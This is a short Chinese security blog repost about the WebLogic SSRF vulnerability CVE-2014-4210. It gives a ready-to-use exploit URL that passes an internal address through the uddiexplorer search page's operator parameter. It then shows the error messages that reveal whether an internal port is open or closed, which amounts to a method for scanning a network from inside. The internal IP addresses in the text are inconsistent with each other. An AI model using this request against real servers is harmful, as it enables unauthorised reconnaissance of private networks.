WEB安全

Weblogic ssrf CVE-2014-4210 扫描内网主机信息

字号+ 作者:雪花 来源:转载 2016-11-27 15:27 我要评论( )

扫描内网主机信息: exp: https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:22rdoSearch=nametxtSearchname=sdftxtSe......

扫描内网主机信息:
exp:https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
 
通过访问exp如果10.0.0.1的22端口处于开启状态将返回
An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.0.0.2:22 which did not have a valid SOAP content-type: null.   
 
访问exp如果10.0.0.1的22端口处于关闭状态将返回
An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Socket Closed  
 
通过返回的不同我们可以扫描内网内主机的端口情况。
 
Weblogic ssrf   CVE-2014-4210 - sn0w - 雪花 -  root@sn0w.top
 
http://www.cnblogs.com/handt/p/5502975.html


本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Web/331.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • DNS Rebinding绕过Java中的SSRF

    DNS Rebinding绕过Java中的SSRF

    2017-09-12 15:21

网友点评
暂时未开启评论功能~